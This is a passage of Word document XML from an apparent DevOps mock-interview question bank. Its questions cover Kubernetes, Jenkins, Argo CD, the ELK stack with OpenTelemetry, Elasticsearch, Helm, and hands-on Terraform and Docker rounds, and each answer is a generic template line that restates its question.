      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Namespaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Namespaces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Namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. What is the role of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etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Can you take a backup of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take a backup of etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. How does the kube-apiserver communicate with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kube-apiserver communicate with etcd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. What is a DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Workloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Workloads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DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. How does the Horizontal Pod Autoscaler (HPA) work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes 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Horizontal Pod Autoscaler (HPA) work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Does HPA scale based on resource requests or resource limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes 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HPA scale based on resource requests or resource limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. Explain StorageClass, Persistent Volume (PV), and Persistent Volume Claim (PVC).</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StorageClass, Persistent Volume (PV), and Persistent Volume Claim (PVC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is the difference between static provisioning and dynamic provisioning?</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static provisioning and dynamic provisioning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. How do you take a backup of your Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Backup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your Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. What is the difference between volume and volumeMount?</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volume and volumeMount?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. What kind of Jenkins pipelines have you created?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Jenkins pipelines have you created?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. How do you take a backup of Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Have you used Argo CD or Harness?</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Argo CD or Harness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. How does Argo CD work?</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Argo CD work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. If someone changes a Kubernetes resource using kubectl but does not update Git, what happens?</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someone changes a Kubernetes resource using kubectl but does not update Git, what happens?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Explain the ELK Stack along with OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/ELK/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring/ELK/OpenTelemetry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ELK Stack along with OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. What is the complete log flow from the application to Kibana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/ELK/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring/ELK/OpenTelemetry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log flow from the application to Kibana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. What is the role of the OpenTelemetry Collector?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the 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the OpenTelemetry Collector?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What is the role of the APM Server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Elastic/APM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Elastic/APM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the APM Server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. How do you delete old logs from Elasticsearch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Elasticsearch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delete old logs from Elasticsearch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. If ILM is not working and Elasticsearch storage is full, how will you clean up the logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Elasticsearch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ILM is not working and Elasticsearch storage is full, how will you clean up the logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. If Kibana is not working, how will you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kibana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Kibana is not working, how will you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. If a Linux server has very high load, how will you reduce it?</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 Linux server has very high load, how will you reduce it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. How do you check whether an application is running?</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check whether an application is running?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. If you cannot log in to the server, how will you check the server load?</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you cannot log in to the server, how will you check the server load?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Have you worked on GKE or GCE?</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GKE or GCE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. Which GCP services have you worked on?</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have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Which monitoring tools have you worked on?</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worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. Have you worked on Prometheus and Grafana?</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Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Did you integrate Prometheus and Grafana?</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integrate Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Have you worked with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Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. How did you deploy Sentinel Antivirus using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm/Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm/Sentinel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deploy Sentinel Antivirus using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Was Sentinel deployed as a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the 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Was Sentinel deployed as a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. Was Sentinel deployed on all worker nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the 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Was Sentinel deployed on all worker nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 66 - Terraform Secret Creation Hands-On Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1.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spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Hands-On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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 67 - Kubernetes StatefulSet Basic Implementation Hands-On Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1.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spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Hands-On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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 68 - Docker HackerAPI Environment Variable Hands-On Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1.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spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Hands-On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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 69 - Terraform Validate Docker Project Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Configure the Docker provider with the correct source and version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Provider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Configure the Docker provider with the correct source and version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Define the required_providers block for a Terraform Docker project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Providers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Define the required_providers block for a Terraform Docker project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you initialize a Terraform project, and why is terraform init required before validation?</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initialize a Terraform project, and why is terraform init required before validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How do you validate a Terraform configuration, and what kinds of errors does terraform validate catch?</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validate a Terraform configuration, and what kinds of errors does terraform validate catch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you identify and fix syntax errors in a Terraform configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Syntax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and fix syntax errors in a Terraform configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you configure a Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Provider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a Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you create a Docker image resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Image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a Docker image resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you create a Docker container resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Container</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Container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a Docker container resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you expose a container port using the ports block?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Ports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container port using the ports block?</w:t>
      </w:r>
    </w:p>
    <w:p>
